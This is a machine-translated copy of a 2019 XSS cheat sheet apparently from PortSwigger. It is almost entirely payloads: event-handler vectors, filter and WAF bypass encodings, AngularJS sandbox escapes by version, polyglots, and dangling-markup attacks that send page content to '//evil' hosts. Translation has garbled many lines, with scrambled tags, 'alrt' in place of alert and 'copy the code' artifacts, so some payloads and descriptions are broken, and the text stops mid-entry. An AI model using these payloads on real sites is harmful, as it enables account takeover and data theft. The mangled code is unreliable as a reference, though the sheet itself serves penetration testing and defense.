Cross-site scripting (XSS) cheat sheet-2019 version

Cross-site scripting (XSS) cheat sheet-2019 version

This is a cross-site scripting (XSS) memo that collects a large number of XSS attack vectors, including various event handling, communication protocols, special attributes, restricted characters, encoding methods, sandbox escape and other techniques, which can help penetration testers Bypass WAF and filtering mechanisms.

Translator's Note: The original text is updated regularly in 2019 by Portswigger's Web Security Academy. Yes, it is the company that developed the famous penetration tool Burp suite. The last update time: Friday, November 8, 2019 at 10:58:07.

Event handling

Event handlers that do not require user interaction

Trigger when an element is activated (IE)

<a id =x tabindex = 1 onactivate=alrt( 1 )></a> Copy code

Triggered after the page is printed (Chrome, Firefox, IE)

<body onafterprint=alrt( 1 )> Copy code

Triggered when CSS animation is cancelled (Firefox)

<style>@keyframes x{ from {left: 0 ;}to {left: 1000px;}}:target {animation:10s ease- in -out 0s 1 x;}</style><a id = x style= " position:absolute;" onanimationcancel= "alrt(1)" ></a> Copy code

Triggered when the CSS animation ends (Chrome, Firefox, IE, Safari)

<style>@keyframes x{}</style><a style= "animation-name:x" onanimationend= "alrt(1)" ></a> Copy code

Triggered when CSS animation is repeated (Chrome, Firefox, IE, Safari)

<style>@keyframes slidein {}</style><a style= "animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration= "alrt(1)" ></a> Copy code

Triggered when the CSS animation starts (Chrome, Firefox, IE, Safari)

<style>@keyframes x{}</style><a style= "animation-name:x" onanimationstart= "alrt(1)" ></a> Copy code

Trigger before activating the element (IE)

<a id =x tabindex = 1 onbeforeactivate=alrt( 1 )></a> Copy code

Triggered before deactivating the element (IE)

<a id =x tabindex = 1 onbeforedeactivate=alrt( 1 )></a>< input autofocus> Copy code

Triggered before the page is printed (Chrome, Firefox, IE)

<body onbeforeprint=alrt( 1 )> Copy code

Triggered after URL changes (Chrome)

<svg><animate onbegin=alrt( 1 ) attributeName=x dur=1s> Copy code

Triggered when the svg animation starts (Chrome, Firefox, Safari)

<svg><animate onbegin=alrt( 1 ) attributeName=x dur=1s> Copy code

Triggered when an element loses focus (Chrome, IE, Safari)

onblur=alrt(. 1 <a). 1 tabindex= ID =x> </a> < INPUT The autofocus> copy the code

Triggered when the marquee bounces (Firefox, IE)

<marquee width= 1 loop= 1 onbounce=alrt( 1 )>XSS</marquee> Copy code

Triggered if the resource can be played (Chrome, Firefox, IE, Safari)

<audio oncanplay=alrt( 1 )><source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Triggered when enough data is loaded to fully play the resource (Chrome, Firefox, IE, Safari)

<video oncanplaythrough=alrt( 1 )><source src= "validvideo.mp4" type = "video/mp4" ></video> Copy code

Triggered when an element is disabled (IE)

<a id =x tabindex = 1 ondeactivate=alrt( 1 )></a>< input id =y autofocus> Copy code

Triggered when the resource is played (Chrome, Firefox, IE, Safari)

<audio controls autoplay onended=alrt( 1 )><source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Triggered when the resource fails to load or causes an error (Chrome, Firefox, IE, Safari)

<audio src/oner=alrt( 1 )> Copy code

Triggered when the checkbox is completed (Firefox, IE)

<marquee width= 1 loop= 1 onfinish=alrt( 1 )>XSS</marquee> Copy code

Triggered when the element has focus (Chrome, IE, Safari)

<a id =x tabindex= 1 onfocus=alrt( 1 )></a> Copy code

Triggered when the element has focus (Chrome, IE, Safari)

<a id =x tabindex = 1 onfocusin=alrt( 1 )></a> Copy code

Triggered when the element loses focus (Chrome, IE, Safari)

onfocusout=alrt(. 1 <a). 1 tabindex= ID =x> </a> < INPUT The autofocus> copy the code

Triggered if the hash value changes (Chrome, Firefox, IE, Safari)

<body onhashchange= "alrt(1)" > Copy code

Triggered when an element is loaded (Safari)

<svg><a onload=alrt( 1 )></a> Copy code

Triggered when the first frame is loaded (Chrome, Firefox, IE, Safari)

<audio onloadeddata=alrt( 1 )><source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Triggered when metadata is loaded (Chrome, Firefox, IE, Safari)

<audio autoplay onloadedmetadata=alrt( 1 )> <source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Triggered when the element has finished loading (Firefox)

<image src=validimage.png onloadend=alrt( 1 )> Copy code

Triggered when the element starts to load (Firefox)

<image src=validimage.png onloadstart=alrt( 1 )> Copy code

Triggered when a message event is received from the postMessage call (Chrome, Firefox, IE, Safari)

<body onmessage=alrt( 1 )> Copy code

Triggered when the page is displayed (Chrome, Firefox, IE, Safari)

<body onpageshow=alrt( 1 )> Copy code

Triggered when the resource is played (Chrome, Firefox, IE, Safari)

<audio autoplay onplay=alrt( 1 )><source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Trigger resource is playing (Chrome, Firefox, IE, Safari)

<audio autoplay onplaying=alrt( 1 )><source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Triggered when history changes (Chrome, Firefox, IE, Safari)

<body onpopstate=alrt( 1 )> Copy code

Triggered when svg animation repeats (Chrome, Firefox, Safari)

<SVG> <Animate OnRepeat ALRT = ( . 1 ) attributeName = X = lS repeatCount DUR = 2/> copy the code

Triggered when the window is resized (Chrome, Firefox, IE, Safari)

<body onresize= "alrt(1)" > Copy code

Triggered when the page scrolls (Chrome, Firefox, IE, Safari)

<body onscroll=alrt( 1 )><div style=height:1000px></div><div id =x></div> Copy code

Triggered when the checkbox starts (Firefox, IE)

<marquee onstart=alrt( 1 )>XSS</marquee> Copy code

Triggered when the timeline is changed (Chrome, Firefox, IE, Safari)

<audio controls autoplay ontimeupdate=alrt( 1 )><source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Triggered when the details tab is expanded (Chrome, Firefox, IE, Safari)

<details ontoggle=alrt( 1 ) open >test</details> Copy code

Triggered when CSS transition is cancelled (Firefox)

<style>:target {color: red;}</style><a id = x style= "transition:color 10s" ontransitioncancel=alrt( 1 )></a> Copy code

Triggered when CSS transition ends (Chrome)

<style>:target {color:red;}</style><a id = x style= "transition:color 1s" ontransitionend=alrt( 1 )></a> Copy code

Triggered when the CSS transition starts (Firefox)

<style>: Transform {target: Rotate (180deg);} </style> <a ID =x style= "transition:transform 2s" ontransitionrun=alrt(. 1 )> </a> duplicated code

Triggered when the promise is not fulfilled (Firefox)

<body onunhandledrejection=alrt( 1 )><script>fetch( '//xyz' )</script> Copy code

Trigger while waiting for data (IE)

<video autoplay controls onwaiting=alrt( 1 )><source src= "validvideo.mp4" type =video/mp4></video> Copy code

Event handlers that require user interaction

Triggered when right-clicking or using the middle mouse button (Chrome, Firefox)

< input onauxclick=alrt( 1 )> Copy code

Need to copy a paragraph of text (Chrome, Firefox, IE, Safari)

onbeforecopy= "alrt(1)" contenteditable> <a the Test </a> copy the code

Request to cut a paragraph of text (Chrome, Firefox, IE, Safari)

<a onbeforecut= "alrt(1)" contenteditable>test</a> Copy code

Need to paste a paragraph of text (IE)

<a onbeforepaste= "alrt(1)" contenteditable>test</a> Copy code

Requires attribute value changes (Chrome, Firefox, IE, Safari)

< INPUT onChange ALRT = ( . 1 ) XSS value => copy the code

Need to click on an element (Chrome, Firefox, IE, Safari)

<a onclick= "alrt(1)" >test</a> Copy code

Triggered when right-click to display the context menu (Chrome, Firefox, IE, Safari)

<a oncontextmenu= "alrt(1)" >test</a> Copy code

Need to copy a paragraph of text (Chrome, Firefox, IE, Safari)

<a oncopy= "alrt(1)" contenteditable>test</a> Copy code

Request to cut a paragraph of text (Chrome, Firefox, IE, Safari)

<a oncut= "alrt(1)" contenteditable>test</a> Copy code

Triggered when an element is double-clicked (Chrome, Firefox, IE, Safari)

<a ondblclick= "alrt(1)" >test</a> Copy code

Trigger drag elements (Chrome, Firefox, IE, Safari)

<a draggable= "true" ondrag= "alrt(1)" >test</a> Copy code

Trigger drag has been completed on the element (Chrome, Firefox, IE, Safari)

<a draggable= "true" ondragend= "alrt(1)" >test</a> Copy code

Need mouse drag (Chrome, Firefox, IE, Safari)

<a draggable= "true" ondragenter= "alrt(1)" >test</a> Copy code

Need mouse drag (Chrome, Firefox, IE, Safari)

<a draggable= "true" ondragleave= "alrt(1)" >test</a> Copy code

Trigger drag elements (Chrome, Firefox, IE, Safari)

<div = draggable with "to true" contenteditable> Drag Me </div> <a ondragover=alrt(. 1) contenteditable> drop here Wallpaper </a> duplicated code

Need mouse drag (Chrome, Firefox, IE, Safari)

<a draggable= "true" ondragstart= "alrt(1)" >test</a> Copy code

Trigger to delete draggable elements (Chrome, Firefox, IE, Safari)

<div = draggable with "to true" contenteditable> Drag Me </div> <a ondrop=alrt(. 1) contenteditable> drop here Wallpaper </a> duplicated code

Need to change as value (Chrome, Firefox, IE, Safari)

< INPUT onInput ALRT = ( . 1 ) XSS value => copy the code

Requires form submission with elements that do not meet its constraints (such as required attributes). (Chrome, Firefox, IE, Safari)

<form> < INPUT oninvalid ALRT = ( . 1 ) required> < INPUT type = Submit> copy the code

Triggered when a key is pressed (Chrome, Firefox, IE, Safari)

<a onkeydown= "alrt(1)" contenteditable>test</a> Copy code

Triggered when a key is pressed (Chrome, Firefox, IE, Safari)

<a onkeypress= "alrt(1)" contenteditable>test</a> Copy code

Triggered when the button is released (Chrome, Firefox, IE, Safari)

<a onkeyup= "alrt(1)" contenteditable>test</a> Copy code

Triggered when the mouse is pressed (Chrome, Firefox, IE, Safari)

<a onmousedown= "alrt(1)" >test</a> Copy code

Triggered when the mouse hovers over an element (Chrome, Firefox, IE, Safari)

<a onmouseenter= "alrt(1)" >test</a> Copy code

Triggered when the mouse moves away from the element (Chrome, Firefox, IE, Safari)

<a onmouseleave= "alrt(1)" >test</a> Copy code

Need mouse movement (Chrome, Firefox, IE, Safari)

<a onmousemove= "alrt(1)" >test</a> Copy code

Triggered when the mouse moves away from the element (Chrome, Firefox, IE, Safari)

<a onmouseout= "alrt(1)" >test</a> Copy code

Need to hover over the element (Chrome, Firefox, IE, Safari)

<a onmouseover= "alrt(1)" >test</a> Copy code

Triggered when the mouse button is released (Chrome, Firefox, IE, Safari)

<a onmouseup= "alrt(1)" >test</a> Copy code

Need to paste a paragraph of text (Chrome, Firefox, IE, Safari)

<a onpaste= "alrt(1)" contenteditable>test</a> Copy code

Need to click the element to pause (Chrome, Firefox, IE, Safari)

<audio autoplay controls onpause=alrt( 1 )><source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Need to click (Chrome, Firefox, IE, Safari)

<form onreset=alrt( 1 )>< input type =reset> Copy code

Triggered when the form is submitted and the type attribute with search is entered (Chrome)

<form>< input type =search onsearch=alrt( 1 ) value= "Hit return" autofocus> Copy code

Need to click on the element timeline (Chrome, Firefox, IE, Safari)

<audio autoplay controls onseeked=alrt( 1 )><source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Need to click on the element timeline (Chrome, Firefox, IE, Safari)

<audio autoplay controls onseeking=alrt( 1 )><source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Need to select text (Chrome, Firefox, IE, Safari)

< input onselect=alrt( 1 ) value= "XSS" autofocus> Copy code

Need to submit a form (Chrome, Firefox, IE, Safari)

<form onsubmit=alrt( 1 )>< input type =submit> Copy code

Need to click anywhere on the page and reload (Chrome)

<svg onunload=window. open ( 'javascript:alrt(1)' )> Copy code

Need to adjust the volume (Chrome, Firefox, IE, Safari)

<audio autoplay controls onvolumechange=alrt( 1 )><source src= "validaudio.wav" type = "audio/wav" ></audio> Copy code

Triggered when using the mouse wheel (Chrome, Firefox, IE, Safari)

<body onwheel=alrt( 1 )> Copy code

Restricted characters

No parentheses, use exception handling

<script>oner=alert;throw 1 </script> Copy code

No parentheses, no semicolons, use exception handling

<script>{oner=alert}throw 1 </script> Copy code

Exception handling without parentheses, no semi-colons in expressions

<script>throw oner=alert, 1 </script> Copy code

No parenthesis exception handling and evil

<script>throw oner = eval , '=alert\x281\x29' </script> Copy code

No parentheses, use exception handling and evil on Firefox

<Script> = {Oner the eval } {the throw the lineNumber: . 1 , the columnNumber: . 1 , fileName: . 1 , Message: 'Alert/x281/X29' } </Script> copy the code

Without parentheses, use ES6 hasInstance and instanceof and eval

<script> 'alert\x281\x29' instanceof{[Symbol.hasInstance]: eval }</script> Copy code

Without parentheses, use ES6's hasInstance, instanceof, and eval

<script> 'alert\x281\x29' instanceof{[Symbol[ 'hasInstance' ]]: eval }</script> Copy code

No parentheses, use position redirection

<script>location = 'javascript:alert\x281\x29' </script> Copy code

No string, no parentheses redirection at the use position

<script>location=name</script> Copy code

No parentheses, use template string

<script>alert` 1 `</script> Copy code

Front-end framework

Bootstrap onanimationstart event

<xss class =" progress - bar - animated " onanimationstart = alert ( 1 )> Copy code

Bootstrap ontransitionend event

<xss class =" carousel slide " data - ride = carousel data - interval =100 ontransitionend = alert ( 1 )>< xss class =" carousel - inner ">< xss class =" carousel - item active "></xss > < xss class =" carousel - item "></xss ></xss ></xss> copy code

Protocol

iframe src attribute JavaScript protocol

<iframe src= "javascript:alrt(1)" > Copy code

Object data attribute with JavaScript protocol

< object data= "javascript:alrt(1)" > Copy code

Use JavaScript protocol to embed src attribute

<embed src= "javascript:alrt(1)" > Copy code

Standard JavaScript protocol

<a href= "javascript:alrt(1)" >XSS</a> Copy code

Case-insensitive protocol

<a href= "JaVaScript:alrt(1)" >XSS</a> Copy code

The characters/x01-/x20 are allowed before the protocol

href= <a "javascript:alrt(1)"> XSS </a> copy the code

The characters/x09,/x0a,/x0d are allowed in the protocol

<a href= "javas cript:alrt(1)" >XSS</a> Copy code

The characters/x09,/x0a,/x0d are allowed before the colon after the protocol name

<a href= "javas cript:alrt(1)" >XSS</a> Copy code

Xlink namespace in SVG with JavaScript protocol

<svg><a xlink:href= "javascript:alrt(1)" ><text x= "20" y= "20" >XSS</text></a> Copy code

SVG animated tags using values

<SVG> <Animate XLink: the href = #xss attributeName = the href = JavaScript values: ALRT (. 1)/> <a id=xss> <text 20 is Y = X = 20 is> XSS </text> </a> copy the code

SVG animation tags are used

<svg><animate xlink:href= #xss attributeName=href from=javascript:alrt(1) to=1/><a id=xss><text x=20 y=20>XSS</text></a > copy code

SVG settings tags

<svg>< set xlink:href= #xss attributeName=href from=? to=javascript:alrt(1)/><a id=xss><text x=20 y=20>XSS</text></a > copy code

Data protocol in script src

<script src= "data:text/javascript,alrt(1)" ></script> Copy code

SVG script href attribute, no need to close the script tag

<svg><script href= "data:text/javascript,alrt(1)"/> Copy code

SVG use element Chrome/Firefox

<svg><use href= "data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www .w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alrt(1)'><rect x='0' y='0' width=' 100' height='100'/></a></svg>#x" ></use></svg> Copy code

Import statement with data URL

<Script> Import ( 'Data: text/JavaScript, ALRT (. 1)' ) </Script> copy the code

Basic markup with JavaScript protocol rewrites relative URL

<base href= "javascript:/a/-alrt(1)///////" ><a href=../lol/safari.html>test</a> Copy code

MathML makes any label clickable

<math><x href= "javascript:alrt(1)" > blahCopy code

Buttons and actions

<form><button formaction=javascript:alrt( 1 )> XSSCopy code

Input and form

<form> < INPUT type = Submit FormAction = JavaScript: ALRT ( . 1 ) XSS value => copy the code

Form and action

<form action=javascript:alrt( 1 )>< input type =submit value=XSS> Copy code

Isindex and formaction

<isindex type =submit formaction=javascript:alrt( 1 )> Copy code

index and action

<isindex type =submit action=javascript:alrt( 1 )> Copy code

Use elements with external URLs

<svg><use href= "//subdomain1.portswigger-labs.net/use_element/upload.php#x"/></svg> Copy code

Other useful attributes

Use srcdoc attribute

<iframe srcdoc= "<img src=1 oner=alrt(1)>" ></iframe> Copy code

Use srcdoc for entities

<iframe srcdoc= "<img src=1 oner=alrt(1)>" ></iframe> Copy code

Click the submit element anywhere on the page (even outside the form)

<form action= "javascript:alrt(1)" >< input type =submit id =x></form><label for =x>XSS</label> Copy code

Hidden input: Access key attributes can enable XSS on elements that are normally unavailable

< INPUT type = "hidden" accesskey = "X-" the onclick = "ALRT (. 1)" > (Press the ALT + + X-ON the SHIFT the Windows) (the ALT + the CTRL + the OS X-X-ON) copying the code

Linked elements: Access key attributes can enable XSS on elements that are not normally available

<Link the rel = "Canonical" accesskey = "X-" the onclick = "ALRT (. 1)"/> (Press the ALT + + X-ON the SHIFT the Windows) (the ALT + the CTRL + the OS X-X-ON) copying the code

Download properties can save a copy of the current web page

<a href= # download="filename.html">Test</a> Copy code

Use Referrerpolicy to disable referrer URLs

<img referrerpolicy= "no-referrer" src= "//portswigger-labs.net" > Copy code

Special label

Redirect to other domain

<meta http-equiv= "refresh" content= "0; url=//portswigger-labs.net" > Copy code

Metacharacter set attribute UTF-7

<meta charset= "UTF-7"/> +ADw-script+AD4-alrt( 1 )+ADw-/script+ AD4- Copy code

Metacharacter set UTF-7

<meta http-equiv= "Content-Type" content= "text/html; charset=UTF-7"/> +ADw-script+AD4-alrt( 1 )+ADw-/script+ AD4- Copy code

UTF-7 BOM character (must be at the beginning of the document) 1

+/v8 +ADw-script+AD4-alrt( 1 )+ADw-/script+ AD4- Copy code

UTF-7 BOM character (must be at the beginning of the document) 2

+/v9 +ADw-script+AD4-alrt( 1 )+ADw-/script+ AD4- Copy code

UTF-7 BOM character (must be at the beginning of the document) 3

+/v+ +ADw-script+AD4-alrt( 1 )+ADw-/script+ AD4- Copy code

UTF-7 BOM character (must be at the beginning of the document) 4

+/v/ +ADw-script+AD4-alrt( 1 )+ADw-/script+ AD4- Copy code

Upgrade insecure request

<meta http-equiv= "Content-Security-Policy" content= "upgrade-insecure-requests" > Copy code

Disable JavaScript via iframe sandbox

<iframe sandbox src= "//portswigger-labs.net" ></iframe> Copy code

Disable referral sources

<meta name= "referrer" content= "no-referrer" > Copy code

Encoding

Super long UTF-8

%C0%BCscript>alrt( 1 )</script> %E0% 80 %BCscript>alrt( 1 )</script> %F0% 80 % 80 %BCscript>alrt( 1 )</script> %F8% 80 % 80 % 80 %BCscript>alrt( 1 )</script> The FC%% 80 % 80 % 80 % 80 % BCscript> ALRT ( . 1 ) </Script> copy the code

Unicode escape

<script>\u0061lert( 1 )</script> Copy code

Unicode escape ES6 style

<script>\u{ 61 }lert( 1 )</script> Copy code

Unicode escape ES6 style zero padding

<script>\u{0000000061}lert( 1 )</script> Copy code

Hexadecimal encoding JavaScript escape

<script> eval ( '\x61lert(1)' )</script> Copy code

Octal encoding

<script> eval ( '\141lert(1)' )</script> <script> eval ( 'alrt(\061)' )</script> <script> eval ( 'alrt(\61)' )</script> Copy code

Decimal encoding with optional semicolon

<a href= "javascript:alrt(1)" >XSS</a><a href= "javascript:alrt(1)" >XSS</a> Copy code

SVG script with HTML encoding

<svg><script>& #97;lert(1)</script></svg> <svg><script>& #x61;lert(1)</script></svg> <svg><script> alert ( 1 )</script></svg> <svg><script>x= "",alrt(1)//" ;</script></svg> Copy code

Decimal encoding with padding zeros

<a href= "javascript:alrt(1)" >XSS</a> Copy code

Hexadecimal coded entity

<a href= "javascript:alrt(1)" >XSS</a> Copy code

If the next character is not a-f0-9, the semicolon hexadecimal encoding is not used

<a href= "javascript:alrt(1)" >XSS</a> <a href= "j avascript:alrt(1)" >XSS</a> <a href= "j avascript:alrt(1)" >XSS</a> Copy code

Hexadecimal encoding with padding zeros

<a href= "javascript:alrt(1)" >XSS</a> Copy code

Hexadecimal encoding is not case sensitive

<a href= "javascript:alrt(1)" >XSS</a> Copy code

HTML entities

<a href= "javascript:alrt(1)" >XSS</a> <a href= "java script:alrt(1)" >XSS</a> <a href= "java script:alrt(1)" >XSS</a> <a href= "javascript:alert(1)" >XSS</a> Copy code

URL encoding

<a href= "javascript:x='%27-alrt(1)-%27';" >XSS</a> Copy code

HTML entities and URL encoding

<a href= "javascript:x='%27-alrt(1)-%27';" >XSS</a> Copy code

Confuse

Firefox allows NULL after &

<a href= "javascriptjavascript:alrt(1)" >Firefox</a> Copy code

Firefox allows NULL to be used in named entities

<a href= "javascript:alrt(1)" >Firefox</a> Copy code

Firefox allows NULL characters in the comments at the beginning

<!-- ><img title= "--><iframe/onload=alrt(1)>" > --> <!-- ><img title= "--><iframe/onload=alrt(1)>" > --> Copy code

Data protocol in script src with base64

<script src=data:text/javascript;base64,YWxlcnQoMSk=></script> Copy code

Client template injection

AngularJS sandbox escape

Version: 1.0.1-1.1.5

{{constructor.constructor('alrt(1)')()}} Copy code

Version: 1.0.1-1.1.5 (shorter)

{{$on.constructor( 'alrt(1)' )()}} Copy code

Version: 1.2.0-1.2.1

{{a= 'constructor' ;b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value, 0 , 'alrt( 1) ' ) ()}} copy the code

Version: 1.2.2-1.2.5

{{{}. ")));alrt(1)//" }} Copy code

Version: 1.2.6-1.2.18

{{(_= '' .sub).call.call({}[$= 'constructor' ].getOwnPropertyDescriptor(_.__proto__,$).value, 0 , 'alrt(1)' )())} Copy Code

Version: 1.2.19-1.2.23

toString.constructor.prototype.call toString.constructor.prototype.toString = {{; [ "A" , "ALRT (. 1)" ] .sort (toString.constructor);}} copy the code

Version: 1.2.24-1.2.29

{{{}. ")));alrt(1)//" }} Copy code

Version: 1.2.27-1.2.29/1.3.0-1.3.20

{{{}. ")));alrt(1)//" }} Copy code

Version: 1.3.0

{{!ready && (ready = true) && ( !call ? $$watchers[ 0 ].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && ( '' + '' .toString( 'F = Function.prototype;' + 'F.apply = Fa;' + 'delete Fa;' + 'delete F.valueOf;' + 'alrt(1);' )));}} Copy code

Version: 1.3.3-1.3.18

{{{}[{toString:[].join,length: 1 , 0 : ' __proto__ ' }].assign=[].join; 'a' .constructor.prototype.charAt=[].join;$ eval ( 'ALRT X = (. 1)//' );}} copy the code

Version: 1.3.19

{{ 'a' [{toString:false,valueOf:[].join,length: 1 , 0 : ' __proto__ ' }].charAt=[].join;$ eval ( 'x=alrt(1)//' );}} Copy code

Version: 1.3.20

{{ 'A' . .Constructor.prototype.charAt = [] the Join; $ the eval ( 'ALRT X = (. 1)' );}} copy the code

Version: 1.4.0-1.4.9

{{ 'A' .constructor.prototype.charAt = [] the Join;. $ The eval ( 'X =. 1}}}; ALRT (. 1)//' );}} copy the code

Version: 1.5.0-1.5.8

X = {{{ 'Y' : '' .constructor.prototype}; X [ 'Y' ] = .charAt [] the Join; $. the eval ( 'ALRT X = (. 1)' );}} copy the code

Version: 1.5.9-1.5.11

{{ c= '' .sub.call;b= '' .sub.bind;a= '' .sub.apply; c.$apply=$apply;c.$ eval =b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync( " astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alrt(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; " ); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a= '' .sub; $ eval ( 'a(bc)' );[].push.apply=a; }} Copy code

Version: >= 1.6.0

{{constructor.constructor( 'alrt(1)' )()}} Copy code

Version: >= 1.6.0 (shorter)

{{$on.constructor( 'alrt(1)' )()}} Copy code

AngularJS sandbox escape based on DOM

All versions (Chrome)

< input autofocus ng-focus = "$event.path|orderBy:'[].constructor.from([1],alert)'" > Copy code

All versions (Chrome) are shorter

< input id =x ng-focus=$event.path|orderBy: '(z=alert)(1)' > Copy code

All versions (all browsers) are shorter

< input autofocus ng-focus = "$event.composedPath()|orderBy:'[].constructor.from([1],alert)'" > Copy code

Version: 1.2.0-1.5.0

<div ng-app ng-csp><div ng-focus= "x=$event;" id =f tabindex= 0 >foo</div><div ng-repeat= "(key, value) in x.view " > <div NG- IF = " Key == 'window' " > {{[ . 1 ] .reduce (value.alert, . 1 );}} </div> </div> </div> copy the code

Scriptless attack

Background attributes

<body background= "//evil? <table background="//evil? <table><thead background= "//evil? <table><tbody background="//evil? <table><tfoot background= "//evil? <table><td background="//evil? <the Table> <TH background = "//Evil? Copy the code

Link href style sheet

<link rel=stylesheet href= "//evil? Copy code

Link href icon

<Link rel = icon href = "//Evil? Copy the code

Meta refresh

<meta http-equiv= "refresh" content= "0; http://evil? Copy code

Img passes the tag through the src attribute

<img src= "//evil? <Image src = "//Evil? Copy the code

Video using track element

<Video> <Track default src = "//Evil? Copy the code

Video using sourcr element and src attribute

<video><source src="//evil? Copy code

Audio using source element and src attribute

<Audio> <Source src = "//Evil? Copy the code

Enter src

< The INPUT of the type = Image src = "//Evil? Copy the code

Button using formaction

<form> <the Button style = "width: 100%; height: 100%" of the type = the Submit formaction = "//Evil? Copy the code

Use formaction input

<form> < the INPUT of the type = the Submit value = "XSS" style = "width: 100%; height: 100%" of the type = the Submit formaction = "//Evil? Copy the code

Form use action

<= X Button form style = "width: 100%; height: 100%;" > <form ID = Action = X ? "Evil// copy the code

Isindex using src attribute

<ISINDEX of the type = Image src = "//Evil? Copy the code

Isindex uses submit

<ISINDEX of the type = the Submit style = width: 100 %; height: 100 %; value = XSS formaction = "//Evil? Copy the code

Object data

< Object the Data = "//Evil? Copy the code

iframe src

<iframes. src = "//Evil? Copy the code

Embed src

<embed src = "//Evil? Copy the code

Mark up with textarea and publish to external sites

<form><button formaction=//evil>XSS</button><textarea name=x> Copy code

Use the form target to pass markup data through window.name

<button form=x>XSS</button><form id =x action=//evil target= ' Copy code

Use the basic target to pass tag data through window.name

<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size= 100 color=red>You must click me</font></a><base target= " Copy code

Use formtarget to pass mark data through window.name

<form>< input type =submit value= "Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget= " Copy code

Use basic href to pass data

<a href=abc style= "width:100%;height:100%;position:absolute;font-size:1000px;" >xss<base href= "//evil/ Copy code

Use embed src to pass data from the page

<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name= " Copy code

Use the iframe window name to pass data from the page

<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name= " Copy code

Use the object window name to pass data from the page

< object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name= " Copy code

Use the frameset window name to pass data from the page

<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name= " Copy code

Multilingual payload

Multilingual payload 1

javascript:/*--></title></style></textarea></script></xmp><svg/onload= '+/"/+/onmouseover=1/+/[*/[]/+alrt(1)//' > Copy code

Multilingual payload 2

javascript: "/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html/" onmouseover=/*<svg/*/onload=alrt()//> Copy code

Classic vector (XSS encryption)

Image src with JavaScript protocol

<img src= "javascript:alrt(1)" > Copy code

Text background with JavaScript protocol

<body background= "javascript:alrt(1)" > Copy code

With modern browsers using empty sources, iframe data URLs no longer work

<iframe src= "data:text/html,<img src=1 oner=alrt(document.domain)>" > Copy code

VBScript protocol for IE

<a href= "vbscript:MsgBox+1" >XSS</a> <a href= "#" onclick= "vbs:Msgbox+1" >XSS</a> <a href= "#" onclick= "VBS:Msgbox+1" >XSS</a> <a href= "#" onclick= "vbscript:Msgbox+1" >XSS</a> <a href= "#" onclick= "VBSCRIPT:Msgbox+1" >XSS</a> <a href= "#" language=vbs onclick= "vbscript:Msgbox+1" >XSS</a> Copy code

JScript compact is the smallest version of JS, not widely used in IE

<a href= "#" onclick= "jscript.compact:alrt(1);" >test</a> <a href= "#" onclick= "JSCRIPT.COMPACT:alrt(1);" >test</a> Copy code

JScript.Encode allows JavaScript to be encoded

<a href= # language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href= # onclick = "JScript.Encode:. # @ ~ ^ CAAAAA == C ^ + D`8 # mgIAAA == ^ # ~ @"> XSS </a> copy the code

VBScript.Encoded allows encoding of VBScript

<iframe onload=VBScript.Encode: #@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode onload= #@~^CAAAAA==\ko$K6,FoQIAAA ==^#~@> Copy code

JavaScript entities for Netscape Navigator

<a title= "&{alrt(1)}" >XSS</a> Copy code

Netscape Navigator used to support JavaScript style sheets

<link href= "xss.js" rel=stylesheet type = "text/javascript" > Copy code

Button for consumption mark

<form> <button name = x formaction = x> <b> stealme copy the code

IE9 select elements and plain text for consumption markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token= "supersecret" </script> Copy code

XBL Firefox only <= 2

<div style= "-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)" > <div style= "\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)" > <div style= "-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)" > <div style= "-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)" > Copy code

XBL also uses data URL to work in FF3.5

<img src= "blah" style= "-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns% 3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url% 20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29% 3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/% 3E%. 3C constructor/Implementation. 3C% 3E%/% 3E%. 3C Binding/Bindings% 3E) "/> copy the code

CSS expression <= IE7

